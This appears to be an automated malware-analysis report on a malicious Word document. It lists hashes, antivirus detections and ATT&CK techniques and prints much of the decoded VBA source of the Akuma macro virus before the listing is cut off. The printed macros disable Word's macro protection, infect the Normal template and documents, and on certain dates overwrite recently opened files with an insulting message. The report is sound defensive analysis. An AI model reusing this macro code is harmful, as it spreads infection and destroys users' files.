Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e6faff396ceb44d7…

MALICIOUS

Office (OLE)

60.5 KB Created: 1999-08-07 04:29:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 721d7713a9addf208a8a43eeaec09b54 SHA-1: ef5497ab8637b279dc332eff7a980440dc904ab2 SHA-256: e6faff396ceb44d7650a134456a59fd77eb3d693bd5fad0609d473519070b877
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The script attempts to clear existing macros and then opens a file named 'c:\cont.dbl' for output, suggesting it is preparing to write or download a payload. The ClamAV detections 'Win.Trojan.Pivis-2' and 'Doc.Trojan.Akuma-2' further indicate malicious intent.

Heuristics 3

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21353 bytes
SHA-256: cbddabe23e6d0af180376676213c27fc47cc06ac7e30bde12ed2b0047b3d1352
Detection
ClamAV: Doc.Trojan.Akuma-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
'Akuma
    On Error Resume Next
    stato = ActiveDocument.Saved
    Application.EnableCancelKey = Not -1
    With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
    End With
    Application.DisplayRecentFiles = True
    RecentFiles.Maximum = 9
    Set bry = NormalTemplate.VBProject.VBComponents.Item(1)
    db = AkumaClear(bry, "Private Sub Document_Close()")
    db = AkumaClear(bry, "Private Sub Document_Open()")
    db = AkumaClear(bry, "Private Function AkumaFind(DoveM, StartM)")
    db = AkumaClear(bry, "Private Function AkumaClear(DoveM, StartM)")
    db = AkumaClear(bry, "Private Function AkumaWrite(StartM)")
    db = AkumaClear(bry, "Private Function AkumaInfect()")
    db = AkumaClear(bry, "Sub Document_Close()")
    db = AkumaClear(bry, "Sub Document_Open()")
    Set bry = ActiveDocument.VBProject.VBComponents.Item(1)
    db = AkumaClear(bry, "Private Sub Document_Close()")
    db = AkumaClear(bry, "Private Sub Document_Open()")
    db = AkumaClear(bry, "Private Function AkumaFind(DoveM, StartM)")
    db = AkumaClear(bry, "Private Function AkumaClear(DoveM, StartM)")
    db = AkumaClear(bry, "Private Function AkumaWrite(StartM)")
    db = AkumaClear(bry, "Private Function AkumaInfect()")
    db = AkumaClear(bry, "Sub Document_Close()")
    db = AkumaClear(bry, "Sub Document_Open()")
    SetAttr "c:\cont.dbl", vbNormal
    Kill "c:\cont.dbl"
    Open "c:\cont.dbl" For Output As #1
    db = AkumaWrite("Private Sub Document_Open()")
    db = AkumaWrite("Private Sub Document_Close()")
    db = AkumaWrite("Private Function AkumaFind(DoveM, StartM)")
    db = AkumaWrite("Private Function AkumaClear(DoveM, StartM)")
    db = AkumaWrite("Private Function AkumaWrite(StartM)")
    db = AkumaWrite("Private Function AkumaInfect()")
    Close #1
    SetAttr "c:\cont.dbl", vbNormal
    AkumaInfect
    Kill "c:\cont.dbl"
    Randomize
    If Int((6 * Rnd) + 1) < 3 Then
        With Dialogs(wdDialogFileSummaryInfo)
            .Title = "Akuma Macro Carrier"
            .Author = "Akuma"
            .Keywords = "Mary Bitch"
            .Execute
        End With
    End If
    If Left(ActiveDocument.Name, 8) <> "Document" Then
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
    End If
    ActiveDocument.Saved = stato
    On Error GoTo 0
End Sub

Private Sub Document_Close()
'Akuma
    On Error Resume Next
    If Day(Date) >= 16 And Day(Date) <= 18 Then
        If Dir("c:\mary.log", vbArchive + vbHidden + vbReadOnly) = "" Then
            For c = 1 To Application.RecentFiles.Count
                If Left(Application.RecentFiles.Item(c).Path, 3) <> "A:\" Then
                    Open Application.RecentFiles.Item(c).Path + "\" + Application.RecentFiles.Item(c) For Output As #1
                    Print #1, "Something wonderful has happened, your PC is alive and even better but some of your documents are infected by the Akuma virus." + Chr$(10) + "Mary is simply a bitch and you, " + Application.UserName + ", are a stupid jerk and lose some files." + Chr$(10) + "Have a nice day."
                    Close #1
                End If
            Next c
        Else
            MsgBox "Something wonderful has happened, your PC is alive and even better but some of your documents are infected by the Akuma virus." + Chr$(10) + "Mary is simply a bitch and you, " + Application.UserName + ", are a stupid jerk and lose some files." + Chr$(10) + "Have a nice day."
        End If
    End If
End Sub

Private Function AkumaFind(DoveM, StartM)
'Akuma
    flagaltro = False
    flagio = False
    For Count = 1 To DoveM.CodeModule.CountOfLines
        If LCase$(DoveM.CodeModule.Lines(Count, 1)) = LCase$(S
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.